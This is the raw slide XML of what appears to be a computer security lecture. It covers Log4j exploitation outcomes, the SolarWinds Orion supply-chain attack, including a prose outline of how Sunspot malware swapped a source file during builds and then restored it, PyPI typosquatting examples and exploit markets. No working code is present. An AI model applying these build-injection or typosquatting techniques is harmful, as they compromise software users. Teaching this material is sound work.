            <a:off x="381000" y="2800350"/>
            <a:ext cx="8458200" cy="2040967"/>
            <a:chOff x="381000" y="2800350"/>
            <a:chExt cx="8458200" cy="20409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59C9D5-3907-9942-8D0C-60480D9C0B02}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="558170" y="2837111"/>
              <a:ext cx="1194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attacker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690418-1EAA-0048-BEE2-E96E2A88A453}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6873810" y="2800350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victim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0D8398-9F88-794D-86CB-6D43FF26320B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="381000" y="2844014"/>
              <a:ext cx="8458200" cy="19973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2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43B0-8FFE-EE4A-98B3-D996EF95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4C2B12-9287-1746-B6E3-63B5F0B04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" y="927920"/>
            <a:ext cx="5410200" cy="2939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D4688-B759-1947-9A1F-74D88BE9F0BD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5562600" y="1504950"/>
            <a:ext cx="3407728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 was this exploited?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Khonsari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> ransomware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XMRIG </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>Cryptominer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Orcus Remote Access Trojan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CE2C1-7F4B-C545-8C89-40A83105B40B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1143000" y="4141485"/>
            <a:ext cx="6873035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How to prevent problems of this type?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Isolation:  sandbox log4j library or sandbox entire application</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="15496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F5C0-BA97-024A-8281-AB417310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 2:  SolarWinds Orion   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>(2020)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F14A-7DEA-3945-B140-4B04852F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SolarWinds Orion:  set of monitoring tools used by many orgs.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3A37B-8D70-494D-B3AD-F7202E6ECF6C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1877907" y="253909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SolarWinds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96A1A-ABB0-5B44-9E4C-F4078CE2F71A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6248400" y="18097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1D419-9B5A-0244-B0D0-5B33A55EE325}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6293874" y="3105150"/>
            <a:ext cx="1752600" cy="6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18000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92537-56D7-974E-9098-C0EF13E9CD99}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7013721" y="2520375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⋮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24D693-EA68-E64B-A215-AAA46D28937F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3630507" y="2006084"/>
            <a:ext cx="2663367" cy="1295400"/>
            <a:chOff x="3630507" y="2158484"/>
            <a:chExt cx="2663367" cy="1295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BF4ACA-DAE6-4945-A2AF-E731369A25AB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630507" y="3034392"/>
              <a:ext cx="78909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E0D959-799F-044E-AC14-853C64AAEFF2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="4419600" y="2158484"/>
              <a:ext cx="1874274" cy="1295400"/>
              <a:chOff x="4419600" y="2158484"/>
              <a:chExt cx="1874274" cy="12954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B347DCE-B09A-B145-B624-E9CDFC6B0AF6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 flipV="1">
                <a:off x="4419600" y="2158484"/>
                <a:ext cx="1828800" cy="87630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479D32-07C2-B744-8071-FF7A625BC534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4419600" y="3039528"/>
                <a:ext cx="1874274" cy="414356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9FC766-387A-F14B-AE75-FB4D65B69DBA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="169475" y="4171950"/>
            <a:ext cx="806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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>(Feb. 20, 2020)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>:  attacker corrupts </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>SolarWinds software update process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AE6854-06BF-414B-8667-D4CD3A9F7584}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="381000" y="2495550"/>
            <a:ext cx="1496907" cy="445533"/>
            <a:chOff x="381000" y="2804334"/>
            <a:chExt cx="1496907" cy="445533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0A146C9-5F77-684F-80B6-F4B4D45DC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34" y="2804334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9DE7EB-D469-4F4A-A04A-209B74B47B53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3246483"/>
              <a:ext cx="1496907" cy="338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A742E80-1DDD-794F-BD2D-6D49CC9D9469}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="2876550"/>
            <a:ext cx="100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sunburst</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>malware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C00FD7-E807-F94B-AF6E-3829B566C1B5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8026809" y="1885950"/>
            <a:ext cx="75504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B4792-36B5-F347-AF9D-3ECAA30F37C4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8058396" y="3181350"/>
            <a:ext cx="74757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orion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2D169-7370-B142-BAAF-F7ADA6586B74}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="169475" y="4570132"/>
            <a:ext cx="668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Large number of infected orgs … not detected until </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" u="sng" dirty="0"/>
              <a:t>Dec. 2020 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="20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6B2F28-F37C-E643-BDFF-48344DA0BE95}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3740205" y="2449124"/>
            <a:ext cx="511068" cy="395639"/>
            <a:chOff x="3740205" y="2710257"/>
            <a:chExt cx="511068" cy="3956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2361C4-35DF-8E49-B989-B1776BCBF92D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094C46A3-01E0-C14D-96D9-F15DA9F48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9F0BA8-B665-1644-9F2D-C39336F42240}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3747715" y="2448378"/>
            <a:ext cx="511068" cy="395639"/>
            <a:chOff x="3740205" y="2710257"/>
            <a:chExt cx="511068" cy="3956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B5A1E0-1EE0-9A47-86C8-8FF2344A288A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3740205" y="2736564"/>
              <a:ext cx="51106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E6256B6F-58A2-2849-A898-0A35864DF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45" y="2710257"/>
              <a:ext cx="370587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7824CA-4B96-FA4A-9B90-4A7F1C01885A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3581400" y="2920217"/>
            <a:ext cx="100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Orion</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>software</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>update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4D4CADA1-9639-BA49-AECE-B60B111732BF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3048000" y="1657350"/>
            <a:ext cx="2458810" cy="539562"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -12407"/>
              <a:gd name="adj2" fmla="val 92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infected DLL</a:t>
            </a:r>
            <a:b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SolarWinds.Orion.Core.DLL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0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6 L 0.47882 0.1370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6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587 L 0.47396 -0.1182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36" grpId="0"/>
      <p:bldP spid="36" grpId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B862-1199-C240-BE32-2066142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Sunspot:  malware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2C43-25F6-AF42-BCB9-4C1FEE88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did attacker corrupt the SolarWinds build process?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>taskhostsvc.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>runs on SolarWinds build system:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>monitors for processes running </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>MsBuild.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>(MS Visual Studio),</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>if found, read </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1"/>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t> line </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1"/>
              <a:t>args</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>to test if Orion software being built,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>if so:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>replace  file  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>InventoryManager.cs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  with malware version</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	(store original version in  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>InventoryManager.bk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when </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>MsBuild.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> exits, restore original file … no trace left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How can an org like SolarWinds detect/prevent this ???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CD0279-9D02-8C4F-B55C-066CF0D2F0BE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="76200" y="4476750"/>
            <a:ext cx="899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5858-530A-2D48-A148-4952C35B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fallout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2B98-E3FE-EB43-9F96-B173DEB5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Large number of orgs and govt systems exposed for many months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generally:   a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>supply chain attack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="1776"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Software, hardware, or service supplier is compromised</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	⟹  many compromised customers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="1776"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Many examples of this in the past   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>(e.g., Target 2013, … )</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="1776"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Defenses?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="310500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9266-A4CC-A448-B88B-FABE798B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3:  typo squatting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4B3F3-F281-7949-A957-3301BBDA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b="1" dirty="0"/>
              <a:t>pip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>:    The package installer for Python</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="0"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Usage:   python  –m pip   install   ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>SomePackage</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>&gt;=2.3’       # specify min version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/>
              <a:t>By default, installs from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>PyPI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>:  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1228725" lvl="2" indent="-257175">
              <a:spcBef>
                <a:spcPts val="1260"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The Python Package Index   (at </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>pypi.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="428625" indent="-257175">
              <a:spcBef>
                <a:spcPts val="1260"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>PyPI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> hosts over 300,000 projects</a:t>
            </a:r>
          </a:p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r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Security considerations?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CEFA98-139A-ED90-AFB6-80A84AA68F5C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="580104" y="1829414"/>
            <a:ext cx="830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considerations:  dependencies</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Google Shape;11;p36">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{63FEFED3-8BA7-054A-8820-A350353B80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087" y="815505"/>
            <a:ext cx="8802913" cy="17991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 fontScale="92500" lnSpcReduction="20000"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dirty="0"/>
              <a:t>Every package you install creates a dependence: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Package maintainer can inject code into your environment</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="428625" indent="-257175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/>
              <a:t>Supply chain attack:  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="0">
              <a:spcBef>
                <a:spcPts val="1260"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	attack on package maintainer  ⟹  compromise dependent projects</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="0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20316-8509-3D41-8612-5EFFCB83C082}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="474414" y="2724150"/>
            <a:ext cx="7736530" cy="2343150"/>
            <a:chOff x="632552" y="3486154"/>
            <a:chExt cx="10315373" cy="29908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99A7A96-86C9-3743-9C8C-908615C9A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41"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="3160198" y="3601276"/>
              <a:ext cx="7282598" cy="22747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14F998-1106-6B48-B979-03D308CFEF3B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2743200" y="6076891"/>
              <a:ext cx="82047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https://</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1350" dirty="0" err="1"/>
                <a:t>jfrog.com</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1350" dirty="0"/>
                <a:t>/blog/malicious-</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1350" dirty="0" err="1"/>
                <a:t>pypi</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1350" dirty="0"/>
                <a:t>-packages-stealing-credit-cards-injecting-code/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BE5909-32A2-7645-B5F1-AF02F7E6A11E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="632552" y="3486154"/>
              <a:ext cx="22821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Many examples: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0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975C5-F9D5-244F-B129-78462440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75896"/>
            <a:ext cx="8556171" cy="488024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considerations:  typo-squatting</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Google Shape;11;p36">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8C1F1FB0-7868-9548-962B-A293DDA030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1819" y="715618"/>
            <a:ext cx="8802913" cy="44278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81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40"/>
              <a:buFont typeface="Source Sans Pro"/>
              <a:buChar char="›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1450" indent="0"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>The risk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>:  malware package with a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0"/>
              <a:t>similar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> name to a popular package</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	⟹  unsuspecting developers install the wrong package</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="0"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="0"/>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0"/>
              <a:t>Examples</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>:  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urllib3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>:  a package to parse URLs.	   Malware package:   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>urlib3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="51435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python-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1"/>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>: net scanning package.	   Malware package:   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1"/>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>-python</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="0">
              <a:tabLst>
                <a:tab pos="5056585" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="0">
              <a:tabLst>
                <a:tab pos="5056585" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>From 2017-2020:  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="5056585" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>40 examples on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>PyPI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> of malware typo-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sqautting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> packages  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="0" algn="r">
              <a:tabLst>
                <a:tab pos="5056585" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>[Meyers-Tozer’2020]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45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r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Pwn2Own competition:   $15K </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="107951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/>
              <a:t>Lots of buggy software</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="2376"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Money can be made from finding and exploiting vulns</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty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exploits (gaining a foothold)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malware (post compromise)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Strong economic and political motivation for using both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307193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state of computer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20FC-319F-E94D-97C3-8E211929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bug bounty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80D88-A513-3D4A-8027-FE9AACEF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37" y="971550"/>
            <a:ext cx="3296863" cy="3656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21B72-E2D1-0746-8A3A-5750D031F9C8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="680465" y="3978514"/>
            <a:ext cx="321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bughunters.google.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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3FA4A-A025-1C4B-8A00-F17D63DA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0176"/>
            <a:ext cx="3968750" cy="2103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EA85D-FBE9-694C-841F-6E9DB6D6CC32}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="762000" y="3028950"/>
            <a:ext cx="25146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3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</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Stanford bug bounty program:  up to $1K</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Pwn2Own competition:   $15K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Option 2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>:   </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Zerodium</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>:  up to $2M for iOS,     $2.5M for Android    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>(since 2019)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>… many others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B5CCE-92C9-F94F-B574-2A92F0ACE135}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="3486150"/>
            <a:ext cx="876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38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1FB8-0314-AD4A-B76C-EC2FA03A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00" y="819150"/>
            <a:ext cx="5240957" cy="431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2B55B2-C254-D94E-8403-5A014760A1C0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7907885" y="788286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44C423-3C67-9243-8AAE-5B20D3317378}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6880460" y="1262899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F29B78-4FEA-164A-BB87-146BBD42AAE3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4343400" y="2845720"/>
            <a:ext cx="17526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0670D-6AA2-EB41-9B7C-3A6A92766F7D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6371033" y="3350244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704DFF8-0483-1F4F-8720-F41E60233C6E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5268686" y="1698171"/>
